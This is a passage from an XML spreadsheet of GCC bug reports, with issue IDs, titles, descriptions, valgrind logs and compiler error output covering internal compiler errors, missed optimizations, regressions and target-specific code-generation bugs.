  </si>
  <si>
    <t>GCC-6964</t>
  </si>
  <si>
    <t>Internal compiler error using -O2 but ok using -O0</t>
  </si>
  <si>
    <t>I am trying to run the test after compiling the latest CVS version of GNU Scientific Library but the compiler aborts. Asked GSL mailing list for support but the consensus was that this error should be reported to gcc development team.
A plain 'configure' was used when gcc was compiled.
Compilation command:
/usr/local/bin/gcc -DHAVE_CONFIG_H -I. -I. -O2 -c test.c
gives the below respons. Compilation is ok if optimization is turned off (-O0).
In file included from test.c:61:
test_complex_source.c: In function `test_complex_float_trap':
test_complex_source.c:258: Internal compiler error in subst at combine.c:3546
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
gcc version 3.1.1 20020605 (prerelease)
Environment:
i686-pc-linux-gnu/kernel 2.4.18-4</t>
  </si>
  <si>
    <t>jari</t>
  </si>
  <si>
    <t>GCC-47754</t>
  </si>
  <si>
    <t>[missed optimization] AVX allows unaligned memory operands but GCC uses unaligned load and register operand</t>
  </si>
  <si>
    <t>According to the AVX docs: With the exception of explicitly aligned 16 or 32 byte SIMD load/store instructions most VEX-encoded arithmetic and data processing instructions operate in a flexible environment regarding memory address alignment i.e. VEX-encoded instruction with 32-byte or 16-byte load semantics will support unaligned load operation by default. Memory arguments for most instructions with VEX prefix operate normally without causing #GP(0) on any byte-granularity alignment (unlike Legacy SSE instructions).
I tested whether GCC would take advantage of this and found that it doesn't:
_mm256_store_ps(&amp;data[3]
  _mm256_add_ps(_mm256_load_ps(&amp;data[0]) _mm256_load_ps(&amp;data[1]))
)
compiles to:
vmovaps 0x200b18(%rip)%ymm0
vaddps 0x200b13(%rip)%ymm0%ymm0
vmovaps %ymm00x200b10(%rip)
whereas
_mm256_store_ps(&amp;data[3]
  _mm256_add_ps(_mm256_loadu_ps(&amp;data[0]) _mm256_loadu_ps(&amp;data[1]))
)
compiles to:
vmovups 0x200b4c(%rip)%ymm0
vmovups 0x200b40(%rip)%ymm1
vaddps %ymm0%ymm1%ymm0
vmovaps %ymm00x200b3c(%rip)
GCC could use a memory operand in the vaddps here instead. According to the AVX docs this doesn't hurt performance. But it reduces register pressure AFAIU.
Would be nice to have.</t>
  </si>
  <si>
    <t>GCC-2642</t>
  </si>
  <si>
    <t>cross-compile for MIPS is missing _MIPS_SZLONG</t>
  </si>
  <si>
    <t>When trying to compile gcc targeted for MIPS Irix6 the symbol _MIPS_SZLONG is undefined.  
Apparently this is a symbol predeclared by the MIPS compiler   but it obviously doesnt exist on a Linux-686 gcc.
I see this is a recent change in the Changelog.  Maybe change it back?
Release:
2.95.2
Environment:
linux-i686
How-To-Repeat:
./configure mips-sgi-irix6.5</t>
  </si>
  <si>
    <t>grg</t>
  </si>
  <si>
    <t>GCC-63504</t>
  </si>
  <si>
    <t>[5 Regression] Issues found by --enable-checking=valgrind</t>
  </si>
  <si>
    <t>(Ordered by first occurrence in log.)
1)
==53187== Use of uninitialised value of size 8
==53187==    at 0x102929D0: find_slot_with_hash (hash-table.h:860)
==53187==    by 0x102929D0: optimize_location_lists_1(die_struct* hash_table*) [clone .isra.249] (dwarf2out.c:24142)
==53187==    by 0x102927A3: optimize_location_lists_1(die_struct* hash_table*) [clone .isra.249] (dwarf2out.c:24149)
==53187==    by 0x102927A3: optimize_location_lists_1(die_struct* hash_table*) [clone .isra.249] (dwarf2out.c:24149)
==53187==    by 0x102927A3: optimize_location_lists_1(die_struct* hash_table*) [clone .isra.249] (dwarf2out.c:24149)
==53187==    by 0x102B6E8F: optimize_location_lists (dwarf2out.c:24192)
==53187==    by 0x102B6E8F: dwarf2out_finish(char const*) (dwarf2out.c:24453)
==53187==    by 0x1058A43F: compile_file() (toplev.c:602)
==53187==    by 0x1058C7AF: do_compile (toplev.c:1946)
==53187==    by 0x1058C7AF: toplev_main(int char**) (toplev.c:2022)
==53187==    by 0x100E131F: main (main.c:36)
==53187==  Uninitialised value was created by a stack allocation
==53187==    at 0x102B8A70: generic_wide_int&amp; generic_wide_int::operator= &gt;(std::pair const&amp;) (wide-int.h:861)
==53187== 
==53187== Use of uninitialised value of size 8
==53187==    at 0x10293100: optimize_location_lists_1(die_struct* hash_table*) [clone .isra.249] (dwarf2out.c:24144)
==53187==    by 0x102927A3: optimize_location_lists_1(die_struct* hash_table*) [clone .isra.249] (dwarf2out.c:24149)
==53187==    by 0x102927A3: optimize_location_lists_1(die_struct* hash_table*) [clone .isra.249] (dwarf2out.c:24149)
==53187==    by 0x102927A3: optimize_location_lists_1(die_struct* hash_table*) [clone .isra.249] (dwarf2out.c:24149)
==53187==    by 0x102B6E8F: optimize_location_lists (dwarf2out.c:24192)
==53187==    by 0x102B6E8F: dwarf2out_finish(char const*) (dwarf2out.c:24453)
==53187==    by 0x1058A43F: compile_file() (toplev.c:602)
==53187==    by 0x1058C7AF: do_compile (toplev.c:1946)
==53187==    by 0x1058C7AF: toplev_main(int char**) (toplev.c:2022)
==53187==    by 0x100E131F: main (main.c:36)
==53187==  Uninitialised value was created by a stack allocation
==53187==    at 0x102B8A70: generic_wide_int&amp; generic_wide_int::operator= &gt;(std::pair const&amp;) (wide-int.h:861)
==53187== 
variation:==18094== Use of uninitialised value of size 8
==18094==    at 0x102929D0: find_slot_with_hash (hash-table.h:860)
==18094==    by 0x102929D0: optimize_location_lists_1(die_struct* hash_table*) [clone .isra.249] (dwarf2out.c:24142)
==18094==    by 0x102927A3: optimize_location_lists_1(die_struct* hash_table*) [clone .isra.249] (dwarf2out.c:24149)
==18094==    by 0x102927A3: optimize_location_lists_1(die_struct* hash_table*) [clone .isra.249] (dwarf2out.c:24149)
==18094==    by 0x102927A3: optimize_location_lists_1(die_struct* hash_table*) [clone .isra.249] (dwarf2out.c:24149)
==18094==    by 0x102927A3: optimize_location_lists_1(die_struct* hash_table*) [clone .isra.249] (dwarf2out.c:24149)
==18094==    by 0x102B6E8F: optimize_location_lists (dwarf2out.c:24192)
==18094==    by 0x102B6E8F: dwarf2out_finish(char const*) (dwarf2out.c:24453)
==18094==    by 0x1058A43F: compile_file() (toplev.c:602)
==18094==    by 0x1058C7AF: do_compile (toplev.c:1946)
==18094==    by 0x1058C7AF: toplev_main(int char**) (toplev.c:2022)
==18094==    by 0x100E131F: main (main.c:36)
==18094==  Uninitialised value was created by a client request
==18094==    at 0x101B1898: pool_alloc(alloc_pool_def*) (alloc-pool.c:298)
==18094==    by 0x103F727F: ira_create_allocno(int bool ira_loop_tree_node*) (ira-build.c:495)
==18094==    by 0x103F7793: create_insn_allocnos(rtx_def* rtx_def* bool) (ira-build.c:1882)
==18094==    by 0x103F7BEB: create_bb_allocnos (ira-build.c:1948)
==18094==    by 0x103F7BEB: create_loop_tree_node_allocnos(ira_loop_tree_node*) (ira-build.c:1994)
==18094==    by 0x103FC36B: ira_traverse_loop_tree(bool ira_loop_tree_node* void (*)(ira_loop_tree_node*) void (*)(ira_loop_tree_node*)) (ira-build.c:1829)
==18094==    by 0x103FC153: ira_traverse_loop_tree(bool ira_loop_tree_node* void (*)(ira_loop_tree_node*) void (*)(ira_loop_tree_node*)) (ira-build.c:1847)
==18094==    by 0x103FC153: ira_traverse_loop_tree(bool ira_loop_tree_node* void (*)(ira_loop_tree_node*) void (*)(ira_loop_tree_node*)) (ira-build.c:1847)
==18094==    by 0x103FCDB7: create_allocnos (ira-build.c:2091)
==18094==    by 0x103FCDB7: ira_build() (ira-build.c:3449)
==18094==    by 0x103F2B17: ira (ira.c:5166)
==18094==    by 0x103F2B17: (anonymous namespace)::pass_ira::execute(function*) (ira.c:5431)
==18094==    by 0x104B5DC7: execute_one_pass(opt_pass*) (passes.c:2151)
==18094==    by 0x104B6463: execute_pass_list_1(opt_pass*) (passes.c:2203)
==18094==    by 0x104B647B: execute_pass_list_1(opt_pass*) (passes.c:2204)
==18094== 
==18094== Use of uninitialised value of size 8
==18094==    at 0x10293100: optimize_location_lists_1(die_struct* hash_table*) [clone .isra.249] (dwarf2out.c:24144)
==18094==    by 0x102927A3: optimize_location_lists_1(die_struct* hash_table*) [clone .isra.249] (dwarf2out.c:24149)
==18094==    by 0x102927A3: optimize_location_lists_1(die_struct* hash_table*) [clone .isra.249] (dwarf2out.c:24149)
==18094==    by 0x102927A3: optimize_location_lists_1(die_struct* hash_table*) [clone .isra.249] (dwarf2out.c:24149)
==18094==    by 0x102927A3: optimize_location_lists_1(die_struct* hash_table*) [clone .isra.249] (dwarf2out.c:24149)
==18094==    by 0x102B6E8F: optimize_location_lists (dwarf2out.c:24192)
==18094==    by 0x102B6E8F: dwarf2out_finish(char const*) (dwarf2out.c:24453)
==18094==    by 0x1058A43F: compile_file() (toplev.c:602)
==18094==    by 0x1058C7AF: do_compile (toplev.c:1946)
==18094==    by 0x1058C7AF: toplev_main(int char**) (toplev.c:2022)
==18094==    by 0x100E131F: main (main.c:36)
==18094==  Uninitialised value was created by a client request
==18094==    at 0x101B1898: pool_alloc(alloc_pool_def*) (alloc-pool.c:298)
==18094==    by 0x103F727F: ira_create_allocno(int bool ira_loop_tree_node*) (ira-build.c:495)
==18094==    by 0x103F7793: create_insn_allocnos(rtx_def* rtx_def* bool) (ira-build.c:1882)
==18094==    by 0x103F7BEB: create_bb_allocnos (ira-build.c:1948)
==18094==    by 0x103F7BEB: create_loop_tree_node_allocnos(ira_loop_tree_node*) (ira-build.c:1994)
==18094==    by 0x103FC36B: ira_traverse_loop_tree(bool ira_loop_tree_node* void (*)(ira_loop_tree_node*) void (*)(ira_loop_tree_node*)) (ira-build.c:1829)
==18094==    by 0x103FC153: ira_traverse_loop_tree(bool ira_loop_tree_node* void (*)(ira_loop_tree_node*) void (*)(ira_loop_tree_node*)) (ira-build.c:1847)
==18094==    by 0x103FC153: ira_traverse_loop_tree(bool ira_loop_tree_node* void (*)(ira_loop_tree_node*) void (*)(ira_loop_tree_node*)) (ira-build.c:1847)
==18094==    by 0x103FCDB7: create_allocnos (ira-build.c:2091)
==18094==    by 0x103FCDB7: ira_build() (ira-build.c:3449)
==18094==    by 0x103F2B17: ira (ira.c:5166)
==18094==    by 0x103F2B17: (anonymous namespace)::pass_ira::execute(function*) (ira.c:5431)
==18094==    by 0x104B5DC7: execute_one_pass(opt_pass*) (passes.c:2151)
==18094==    by 0x104B6463: execute_pass_list_1(opt_pass*) (passes.c:2203)
==18094==    by 0x104B647B: execute_pass_list_1(opt_pass*) (passes.c:2204)
==18094== 
2)==24993== Conditional jump or move depends on uninitialised value(s)
==24993==    at 0x1080E8CC: divmod_internal_2 (wide-int.cc:1623)
==24993==    by 0x1080E8CC: wi::divmod_internal(long* unsigned int* long* long const* unsigned int unsigned int long const* unsigned int unsigned int signop_e bool*
) (wide-int.cc:1823)
==24993==    by 0x103132C7: div_trunc &gt; (wide-int.h:2506)
==24993==    by 0x103132C7: int_const_binop_1(tree_code tree_node const* tree_node const* int) (fold-const.c:1038)
==24993==    by 0x1079BC6F: vrp_int_const_binop(tree_code tree_node* tree_node*) (tree-vrp.c:1934)
==24993==    by 0x1079C2EB: extract_range_from_multiplicative_op_1(value_range_d* tree_code value_range_d* value_range_d*) (tree-vrp.c:2218)
==24993==    by 0x107A06CF: extract_range_from_binary_expr_1(value_range_d* tree_code tree_node* value_range_d* value_range_d*) (tree-vrp.c:3117)
==24993==    by 0x1079FCC7: extract_range_from_binary_expr_1(value_range_d* tree_code tree_node* value_range_d* value_range_d*) (tree-vrp.c:2397)
==24993==    by 0x107A2E57: extract_range_from_binary_expr(value_range_d* tree_code tree_node* tree_node* tree_node*) (tree-vrp.c:3293)
==24993==    by 0x107A6373: extract_range_from_assignment(value_range_d* gimple_statement_base*) (tree-vrp.c:4003)
==24993==    by 0x107A8227: vrp_visit_assignment_or_call (tree-vrp.c:6920)
==24993==    by 0x107A8227: vrp_visit_stmt(gimple_statement_base* edge_def** tree_node**) (tree-vrp.c:7731)
==24993==    by 0x106DEC97: simulate_stmt(gimple_statement_base*) (tree-ssa-propagate.c:331)
==24993==    by 0x106E153F: simulate_block (tree-ssa-propagate.c:454)
==24993==    by 0x106E153F: ssa_propagate(ssa_prop_result (*)(gimple_statement_base* edge_def** tree_node**) ssa_prop_result (*)(gimple_statement_base*)) (tree-ssa-propaga
te.c:871)
==24993==    by 0x107B063F: execute_vrp (tree-vrp.c:9994)
==24993==    by 0x107B063F: (anonymous namespace)::pass_vrp::execute(function*) (tree-vrp.c:10074)
==24993==  Uninitialised value was created by a stack allocation
==24993==    at 0x1080E418: wi::divmod_internal(long* unsigned int* long* long const* unsigned int unsigned int long const* unsigned int unsigned int signop_e bool*
) (wide-int.cc:1683)
==24993== 
==24993== Conditional jump or move depends on uninitialised value(s)
==24993==    at 0x1080E8E4: divmod_internal_2 (wide-int.cc:1623)
==24993==    by 0x1080E8E4: wi::divmod_internal(long* unsigned int* long* long const* unsigned int unsigned int long const* unsigned int unsigned int signop_e bool*
) (wide-int.cc:1823)
==24993==    by 0x103132C7: div_trunc &gt; (wide-int.h:2506)
==24993==    by 0x103132C7: int_const_binop_1(tree_code tree_node const* tree_node const* int) (fold-const.c:1038)
==24993==    by 0x1079BC6F: vrp_int_const_binop(tree_code tree_node* tree_node*) (tree-vrp.c:1934)
==24993==    by 0x1079C2EB: extract_range_from_multiplicative_op_1(value_range_d* tree_code value_range_d* value_range_d*) (tree-vrp.c:2218)
==24993==    by 0x107A06CF: extract_range_from_binary_expr_1(value_range_d* tree_code tree_node* value_range_d* value_range_d*) (tree-vrp.c:3117)
==24993==    by 0x1079FCC7: extract_range_from_binary_expr_1(value_range_d* tree_code tree_node* value_range_d* value_range_d*) (tree-vrp.c:2397)
==24993==    by 0x107A2E57: extract_range_from_binary_expr(value_range_d* tree_code tree_node* tree_node* tree_node*) (tree-vrp.c:3293)
==24993==    by 0x107A6373: extract_range_from_assignment(value_range_d* gimple_statement_base*) (tree-vrp.c:4003)
==24993==    by 0x107A8227: vrp_visit_assignment_or_call (tree-vrp.c:6920)
==24993==    by 0x107A8227: vrp_visit_stmt(gimple_statement_base* edge_def** tree_node**) (tree-vrp.c:7731)
==24993==    by 0x106DEC97: simulate_stmt(gimple_statement_base*) (tree-ssa-propagate.c:331)
==24993==    by 0x106E153F: simulate_block (tree-ssa-propagate.c:454)
==24993==    by 0x106E153F: ssa_propagate(ssa_prop_result (*)(gimple_statement_base* edge_def** tree_node**) ssa_prop_result (*)(gimple_statement_base*)) (tree-ssa-propagate.c:871)
==24993==    by 0x107B063F: execute_vrp (tree-vrp.c:9994)
==24993==    by 0x107B063F: (anonymous namespace)::pass_vrp::execute(function*) (tree-vrp.c:10074)
==24993==  Uninitialised value was created by a stack allocation
==24993==    at 0x1080E418: wi::divmod_internal(long* unsigned int* long* long const* unsigned int unsigned int long const* unsigned int unsigned int signop_e bool*) (wide-int.cc:1683)
==24993== 
==24993== Conditional jump or move depends on uninitialised value(s)
==24993==    at 0x1080E964: divmod_internal_2 (wide-int.cc:1645)
==24993==    by 0x1080E964: wi::divmod_internal(long* unsigned int* long* long const* unsigned int unsigned int long const* unsigned int unsigned int signop_e bool*) (wide-int.cc:1823)
==24993==    by 0x103132C7: div_trunc &gt; (wide-int.h:2506)
==24993==    by 0x103132C7: int_const_binop_1(tree_code tree_node const* tree_node const* int) (fold-const.c:1038)
==24993==    by 0x1079BC6F: vrp_int_const_binop(tree_code tree_node* tree_node*) (tree-vrp.c:1934)
==24993==    by 0x1079C2EB: extract_range_from_multiplicative_op_1(value_range_d* tree_code value_range_d* value_range_d*) (tree-vrp.c:2218)
==24993==    by 0x107A06CF: extract_range_from_binary_expr_1(value_range_d* tree_code tree_node* value_range_d* value_range_d*) (tree-vrp.c:3117)
==24993==    by 0x1079FCC7: extract_range_from_binary_expr_1(value_range_d* tree_code tree_node* value_range_d* value_range_d*) (tree-vrp.c:2397)
==24993==    by 0x107A2E57: extract_range_from_binary_expr(value_range_d* tree_code tree_node* tree_node* tree_node*) (tree-vrp.c:3293)
==24993==    by 0x107A6373: extract_range_from_assignment(value_range_d* gimple_statement_base*) (tree-vrp.c:4003)
==24993==    by 0x107A8227: vrp_visit_assignment_or_call (tree-vrp.c:6920)
==24993==    by 0x107A8227: vrp_visit_stmt(gimple_statement_base* edge_def** tree_node**) (tree-vrp.c:7731)
==24993==    by 0x106DEC97: simulate_stmt(gimple_statement_base*) (tree-ssa-propagate.c:331)
==24993==    by 0x106E153F: simulate_block (tree-ssa-propagate.c:454)
==24993==    by 0x106E153F: ssa_propagate(ssa_prop_result (*)(gimple_statement_base* edge_def** tree_node**) ssa_prop_result (*)(gimple_statement_base*)) (tree-ssa-propagate.c:871)
==24993==    by 0x107B063F: execute_vrp (tree-vrp.c:9994)
==24993==    by 0x107B063F: (anonymous namespace)::pass_vrp::execute(function*) (tree-vrp.c:10074)
==24993==  Uninitialised value was created by a stack allocation
==24993==    at 0x1080E418: wi::divmod_internal(long* unsigned int* long* long const* unsigned int unsigned int long const* unsigned int unsigned int signop_e bool*) (wide-int.cc:1683)
==24993== 
==24993== Conditional jump or move depends on uninitialised value(s)
==24993==    at 0x10809E8C: canonize(long* unsigned int unsigned int) (wide-int.cc:109)
==24993==    by 0x1080E9DB: wi::divmod_internal(long* unsigned int* long* long const* unsigned int unsigned int long const* unsigned int unsigned int signop_e bool*) (wide-int.cc:1829)
==24993==    by 0x1079BC6F: vrp_int_const_binop(tree_code tree_node* tree_node*) (tree-vrp.c:1934)
==24993==    by 0x1079C2EB: extract_range_from_multiplicative_op_1(value_range_d* tree_code value_range_d* value_range_d*) (tree-vrp.c:2218)
==24993==    by 0x107A06CF: extract_range_from_binary_expr_1(value_range_d* tree_code tree_node* value_range_d* value_range_d*) (tree-vrp.c:3117)
==24993==    by 0x1079FCC7: extract_range_from_binary_expr_1(value_range_d* tree_code tree_node* value_range_d* value_range_d*) (tree-vrp.c:2397)
==24993==    by 0x107A2E57: extract_range_from_binary_expr(value_range_d* tree_code tree_node* tree_node* tree_node*) (tree-vrp.c:3293)
==24993==    by 0x107A6373: extract_range_from_assignment(value_range_d* gimple_statement_base*) (tree-vrp.c:4003)
==24993==    by 0x107A8227: vrp_visit_assignment_or_call (tree-vrp.c:6920)
==24993==    by 0x107A8227: vrp_visit_stmt(gimple_statement_base* edge_def** tree_node**) (tree-vrp.c:7731)
==24993==    by 0x106DEC97: simulate_stmt(gimple_statement_base*) (tree-ssa-propagate.c:331)
==24993==    by 0x106E153F: simulate_block (tree-ssa-propagate.c:454)
==24993==    by 0x106E153F: ssa_propagate(ssa_prop_result (*)(gimple_statement_base* edge_def** tree_node**) ssa_prop_result (*)(gimple_statement_base*)) (tree-ssa-propagate.c:871)
==24993==    by 0x107B063F: execute_vrp (tree-vrp.c:9994)
==24993==    by 0x107B063F: (anonymous namespace)::pass_vrp::execute(function*) (tree-vrp.c:10074)
==24993==  Uninitialised value was created by a stack allocation
==24993==    at 0x1080E418: wi::divmod_internal(long* unsigned int* long* long const* unsigned int unsigned int long const* unsigned int unsigned int signop_e bool*) (wide-int.cc:1683)
==24993== 
==24993== Conditional jump or move depends on uninitialised value(s)
==24993==    at 0x107CA644: force_fit_type(tree_node* generic_wide_int &gt; const&amp; int bool) (tree.c:1223)
==24993==    by 0x103135A7: int_const_binop_1(tree_code tree_node const* tree_node const* int) (fold-const.c:1098)
==24993==    by 0x1079BC6F: vrp_int_const_binop(tree_code tree_node* tree_node*) (tree-vrp.c:1934)
==24993==    by 0x1079C2EB: extract_range_from_multiplicative_op_1(value_range_d* tree_code value_range_d* value_range_d*) (tree-vrp.c:2218)
==24993==    by 0x107A06CF: extract_range_from_binary_expr_1(value_range_d* tree_code tree_node* value_range_d* value_range_d*) (tree-vrp.c:3117)
==24993==    by 0x1079FCC7: extract_range_from_binary_expr_1(value_range_d* tree_code tree_node* value_range_d* value_range_d*) (tree-vrp.c:2397)
==24993==    by 0x107A2E57: extract_range_from_binary_expr(value_range_d* tree_code tree_node* tree_node* tree_node*) (tree-vrp.c:3293)
==24993==    by 0x107A6373: extract_range_from_assignment(value_range_d* gimple_statement_base*) (tree-vrp.c:4003)
==24993==    by 0x107A8227: vrp_visit_assignment_or_call (tree-vrp.c:6920)
==24993==    by 0x107A8227: vrp_visit_stmt(gimple_statement_base* edge_def** tree_node**) (tree-vrp.c:7731)
==24993==    by 0x106DEC97: simulate_stmt(gimple_statement_base*) (tree-ssa-propagate.c:331)
==24993==    by 0x106E153F: simulate_block (tree-ssa-propagate.c:454)
==24993==    by 0x106E153F: ssa_propagate(ssa_prop_result (*)(gimple_statement_base* edge_def** tree_node**) ssa_prop_result (*)(gimple_statement_base*)) (tree-ssa-propagate.c:871)
==24993==    by 0x107B063F: execute_vrp (tree-vrp.c:9994)
==24993==    by 0x107B063F: (anonymous namespace)::pass_vrp::execute(function*) (tree-vrp.c:10074)
==24993==  Uninitialised value was created by a stack allocation
==24993==    at 0x1080E418: wi::divmod_internal(long* unsigned int* long* long const* unsigned int unsigned int long const* unsigned int unsigned int signop_e bool*) (wide-int.cc:1683)
...
3)
==25128== Invalid read of size 4
==25128==    at 0x10A41D6C: get_last_value_validate(rtx_def** rtx_insn* int int) (combine.c:12629)
==25128==    by 0x10A41B97: get_last_value_validate(rtx_def** rtx_insn* int int) (combine.c:12688)
==25128==    by 0x10A42BF7: record_value_for_reg(rtx_def* rtx_insn* rtx_def*) (combine.c:12300)
==25128==    by 0x1051F41F: note_stores(rtx_def const* void (*)(rtx_def* rtx_def const* void*) void*) (rtlanal.c:1606)
==25128==    by 0x10A4320F: record_dead_and_set_regs(rtx_insn*) (combine.c:12432)
==25128==    by 0x10A5D3FB: combine_instructions (combine.c:1473)
==25128==    by 0x10A5D3FB: rest_of_handle_combine (combine.c:13902)
==25128==    by 0x10A5D3FB: (anonymous namespace)::pass_combine::execute(function*) (combine.c:13945)
==25128==    by 0x104B5DC7: execute_one_pass(opt_pass*) (passes.c:2151)
==25128==    by 0x104B6463: execute_pass_list_1(opt_pass*) (passes.c:2203)
==25128==    by 0x104B647B: execute_pass_list_1(opt_pass*) (passes.c:2204)
==25128==    by 0x104B64FB: execute_pass_list(function* opt_pass*) (passes.c:2214)
==25128==    by 0x102236F7: cgraph_node::expand() (cgraphunit.c:1735)
==25128==    by 0x10224CC7: expand_all_functions (cgraphunit.c:1871)
==25128==    by 0x10224CC7: symbol_table::compile() (cgraphunit.c:2206)
==25128==  Address 0xd35cef8 is 0 bytes after a block of size 2152 alloc'd
==25128==    at 0x402924C: malloc (vg_replace_malloc.c:296)
==25128==    by 0x10BA2E73: xmalloc (xmalloc.c:147)
==25128==    by 0x104F4823: regstat_init_n_sets_and_refs() (regstat.c:60)
==25128==    by 0x10A5C7A3: rest_of_handle_combine (combine.c:13899)
==25128==    by 0x10A5C7A3: (anonymous namespace)::pass_combine::execute(function*) (combine.c:13945)
==25128==    by 0x104B5DC7: execute_one_pass(opt_pass*) (passes.c:2151)
==25128==    by 0x104B6463: execute_pass_list_1(opt_pass*) (passes.c:2203)
==25128==    by 0x104B647B: execute_pass_list_1(opt_pass*) (passes.c:2204)
==25128==    by 0x104B64FB: execute_pass_list(function* opt_pass*) (passes.c:2214)
==25128==    by 0x102236F7: cgraph_node::expand() (cgraphunit.c:1735)
==25128==    by 0x10224CC7: expand_all_functions (cgraphunit.c:1871)
==25128==    by 0x10224CC7: symbol_table::compile() (cgraphunit.c:2206)
==25128==    by 0x10226533: symbol_table::finalize_compilation_unit() (cgraphunit.c:2283)
==25128==    by 0x100F78A3: c_write_global_declarations() (c-decl.c:10623)
==25128==</t>
  </si>
  <si>
    <t>GCC-77655</t>
  </si>
  <si>
    <t>[6/7 Regression]ICE on invalid c++ code on x86_64-linux-gnu (internal compiler error: Segmentation fault (program cc1plus))</t>
  </si>
  <si>
    <t>$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/7.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 7.0.0 20160919 (experimental) [trunk revision 240232] (GCC) 
$ 
$ gcc-trunk small.C
small.C: In instantiation of â€˜decltype (g(0 (g)(h::a)...)) h(A decltype (g(0 (g)(h::a)...)) = void decltype (a) = ]â€™:
small.C:8:5:   required from here
small.C:4:4: error: no matching function for call to â€˜h(h(A decltype (g(0 (g)(h::a)...)) = void decltype (a) = ]::)â€™
   h([] {})
   ~^~~~~~~
small.C:3:6: note: candidate: template decltype (g(0 (g)(h::a)...)) h(A&amp;&amp; ...)
 auto h(A &amp;&amp;... a) -&gt; decltype(g(0 g(a)...)) {
      ^
small.C:3:6: note:   template argument deduction/substitution failed:
gcc-trunk: internal compiler error: Segmentation fault (program cc1plus)
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$ 
$ cat small.C
template  void g(F)
template 
auto h(A &amp;&amp;... a) -&gt; decltype(g(0 g(a)...)) {
  h([] {})
}
int main() { 
  h() 
  return 0 
}
$</t>
  </si>
  <si>
    <t>GCC-2780</t>
  </si>
  <si>
    <t>[m68k] pic code gen problem</t>
  </si>
  <si>
    <t>The m68k compiler produces incorrect branch code when -fpic is
specified and the target is below a 68020 (in my example
I'm building for a -m5200 target the same problem exists
for -m68000).
The trouble is that the compiler is producing jbra (and
equivalent conditional) branch instructions which for
pre-68020 targets will be turned into absolute jump
instructions when the branch offset is too large (&gt;32k).
The result is a jump to an unrelated (random?) address.
No error messages are produced either by gcc or gas.
Release:
2.95.3 20010315
Environment:
Red Hat 7 on i686 with 2.2 Linux Kernel
Clean build of 2.95.3 m68k cross compiler with these configure options:
    --target=m68k-elf --prefix=/usr/local -v</t>
  </si>
  <si>
    <t>pauli</t>
  </si>
  <si>
    <t>GCC-12186</t>
  </si>
  <si>
    <t>[3.4 regression] HP's compiler crashes when bootstrapping gcc</t>
  </si>
  <si>
    <t>If HP's compiler (version HP92453-01 B.11.11.04) is used to bootstrap
the trunk fails to build gcc.
See http://gcc.gnu.org/ml/gcc/2003-09/msg00150.html for an analysis
evidently HP didn't implement |= assignment to a bitfield.
In http://gcc.gnu.org/ml/gcc-patches/2003-09/msg00222.html you will
find a one-line patch to correct the problem.</t>
  </si>
  <si>
    <t>GCC-31403</t>
  </si>
  <si>
    <t>wrong branch instructions generated with -m2a on sh-elf</t>
  </si>
  <si>
    <t>Hello
there seems to be a gcc problem with the target 'sh-elf':
/home/mstein/sim/sh-elf/build/./gcc/xgcc -B/home/mstein/sim/sh-elf/build/./gcc/ -nostdinc -B/home/mstein/sim/sh-elf/build/sh-elf/newlib/ -isystem /home/mstein/sim/sh-elf/build/sh-elf/newlib/targ-include -isystem /n/07/mstein/combined-trunk/newlib/libc/include -B/n/07/mstein/cross-local/sh-elf-new/sh-elf/bin/ -B/n/07/mstein/cross-local/sh-elf-new/sh-elf/lib/ -isystem /n/07/mstein/cross-local/sh-elf-new/sh-elf/include -isystem /n/07/mstein/cross-local/sh-elf-new/sh-elf/sys-include -L/home/mstein/sim/sh-elf/build/./ld -DPACKAGE_NAME=\newlib\ -DPACKAGE_TARNAME=\newlib\ -DPACKAGE_VERSION=\1.15.0\ -DPACKAGE_STRING=\newlib\ 1.15.0\ -DPACKAGE_BUGREPORT=\\  -I. -I/n/07/mstein/combined-trunk/newlib/libc/stdio -O2 -fno-builtin      -O2 -g -O2   -m2a -fshort-enums -DINTEGER_ONLY -c /n/07/mstein/combined-trunk/newlib/libc/stdio/vfprintf.c -o lib_a-vfiprintf.o
/tmp/cckWXaXf.s: Assembler messages:
/tmp/cckWXaXf.s:456: Error: displacement to defined symbol .L432 overflows 12-bit field
/tmp/cckWXaXf.s:2993: Error: displacement to defined symbol .L407 overflows 12-bit field
/tmp/cckWXaXf.s:3157: Error: displacement to defined symbol .L799 overflows 12-bit field
/tmp/cckWXaXf.s:3606: Error: displacement to defined symbol .L198 overflows 12-bit field
make[8]: *** [lib_a-vfiprintf.o] Error 1
The SVN revision was 123344.</t>
  </si>
  <si>
    <t>GCC-28410</t>
  </si>
  <si>
    <t>[4.2 Regression] Wrong aliasing with global var grouping during call clobbering</t>
  </si>
  <si>
    <t>struct Bar { int p }
struct Foo { struct Bar *p }
int foo(struct Foo *f)
{
  f-&gt;p-&gt;p = 1
  bar(f)
  return f-&gt;p-&gt;p
}
.alias1:
  #   VUSE 
  D.1528_2 = f_1-&gt;p 
  #   SMT.5_8 = V_MAY_DEF 
  D.1528_2-&gt;p = 1
  #   .GLOBAL_VAR_10 = V_MAY_DEF 
  bar (f_1)
  #   VUSE 
  D.1528_3 = f_1-&gt;p
  #   VUSE 
  D.1529_4 = D.1528_3-&gt;p
  return D.1529_4
and fre then does:
  #   VUSE 
  D.1528_2 = f_1-&gt;p
  #   SMT.5_8 = V_MAY_DEF 
  D.1528_2-&gt;p = 1
  #   .GLOBAL_VAR_10 = V_MAY_DEF 
  bar (f_1)
  D.1528_3 = D.1528_2
  #   VUSE 
  D.1529_4 = D.1528_3-&gt;p
  return D.1529_4
miscompiles kde4.</t>
  </si>
  <si>
    <t>GCC-21914</t>
  </si>
  <si>
    <t>[4.1 regression] mmix-knuth-mmixware testsuite failure: compile/20030703-1.c</t>
  </si>
  <si>
    <t>With LAST_UPDATED: Thu Jun  2 10:12:34 UTC 2005 and ever since
I get:
Running
/home/hp/combined/combined/gcc/testsuite/gcc.c-torture/compile/compile.exp ...
FAIL: gcc.c-torture/compile/20030703-1.c  -O2  (test for excess errors)
FAIL: gcc.c-torture/compile/20030703-1.c  -O3 -fomit-frame-pointer  (test for
excess errors)
FAIL: gcc.c-torture/compile/20030703-1.c  -O3 -g  (test for excess errors)
With the message in the .log being:
